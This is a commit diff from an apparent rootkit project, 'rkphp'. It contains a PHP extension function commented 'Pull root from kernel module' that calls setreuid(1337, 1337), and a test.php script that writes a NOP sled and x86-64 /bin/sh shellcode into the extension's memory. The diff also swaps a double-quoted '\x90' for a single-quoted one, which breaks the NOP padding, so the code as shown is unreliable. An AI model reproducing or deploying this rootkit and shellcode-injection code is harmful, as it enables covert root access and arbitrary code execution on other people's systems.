Browse Source

Default

master
Root 5 years ago
parent
commit
0e40d57a23
  1. 14
      rkphp/include/common.h
  2. 7
      rkphp/src/main.c
  3. 1
      rkphp/src/php_funcs.c
  4. 8
      rkphp/test.php

14
rkphp/include/common.h

@ -8,6 +8,10 @@ @@ -8,6 +8,10 @@
#include "php.h"
#include "ext/standard/info.h"
#ifdef ZTS
#include "TSRM.h"
#endif
#ifdef HAVE_DEBUG
#define RKPHP_DEBUG 1
#else
@ -20,6 +24,12 @@ @@ -20,6 +24,12 @@
extern zend_module_entry rkphp_module_entry;
#define phpext_rkphp_ptr &rkphp_module_entry
ZEND_DECLARE_MODULE_GLOBALS(rkphp);
ZEND_BEGIN_MODULE_GLOBALS(rkphp)
int rkphp_glob;
ZEND_END_MODULE_GLOBALS(rkphp)
PHP_FUNCTION(rkphp_ex);
PHP_MINIT_FUNCTION(rkphp);
@ -32,10 +42,6 @@ PHP_MINFO_FUNCTION(rkphp); @@ -32,10 +42,6 @@ PHP_MINFO_FUNCTION(rkphp);
#endif
#endif
ZEND_BEGIN_MODULE_GLOBALS(rkphp)
int rkphp_glob;
ZEND_END_MODULE_GLOBALS(rkphp)
// Custom printf macro to strip all debug messages on compile-time
// Removes debugging strings from appearing during runtime & in the binary
#if RKPHP_DEBUG == 1

7
rkphp/src/main.c

@ -1,10 +1,5 @@ @@ -1,10 +1,5 @@
#include "common.h"
ZEND_DECLARE_MODULE_GLOBALS(rkphp);
/* True global resources - no need for thread safety here */
//static int rkphp_glob;
/* {{{ rkphp_functions[]
*
* Every user visible function must have an entry in rkphp_functions[].
@ -12,7 +7,7 @@ ZEND_DECLARE_MODULE_GLOBALS(rkphp); @@ -12,7 +7,7 @@ ZEND_DECLARE_MODULE_GLOBALS(rkphp);
zend_function_entry rkphp_functions[] =
{
PHP_FE(rkphp_ex, NULL)
{NULL, NULL, NULL} /* Must be the last line in rkphp_functions[] */
PHP_FE_END
};
/* }}} */

1
rkphp/src/php_funcs.c

@ -43,6 +43,7 @@ PHP_FUNCTION(rkphp_ex) @@ -43,6 +43,7 @@ PHP_FUNCTION(rkphp_ex)
RKPHP_PRINTF("[!] CODE: %lx matched %lx\n", lstart + lend, code);
// Pull root from kernel module.
setreuid(1337, 1337);
/* This is where we'll attempt to interact with the kernel rkmod */

8
rkphp/test.php

@ -1,5 +1,7 @@ @@ -1,5 +1,7 @@
<?php
print_r(get_loaded_extensions());
/* Get address range of extension */
function get_ext_range($name)
{
@ -19,7 +21,7 @@ function get_ext_range($name) @@ -19,7 +21,7 @@ function get_ext_range($name)
/* Generate the shell code to inject */
function gen_shc($range, $shc)
{
$_shc = str_repeat("\x90", $range[1] - $range[0] - strlen($shc));
$_shc = str_repeat('\x90', $range[1] - $range[0] - strlen($shc));
$_shc .= $shc;
return $_shc;
}
@ -43,9 +45,7 @@ $shc = "\x48\x31\xff\x48\xf7\xe7\xb0\x3b\x48\xbf\x66" . @@ -43,9 +45,7 @@ $shc = "\x48\x31\xff\x48\xf7\xe7\xb0\x3b\x48\xbf\x66" .
"\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08" .
"\x57\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";
$shc_with_nops = gen_shc($range, $shc);
if(rkphp_ex(getmypid(), $range[0] + $range[1]) == NULL)
die('Failed to execute!' . PHP_EOL);
w_mem($range[0], $shc_with_nops);
w_mem($range[0], gen_shc($range, $shc));

Loading…
Cancel
Save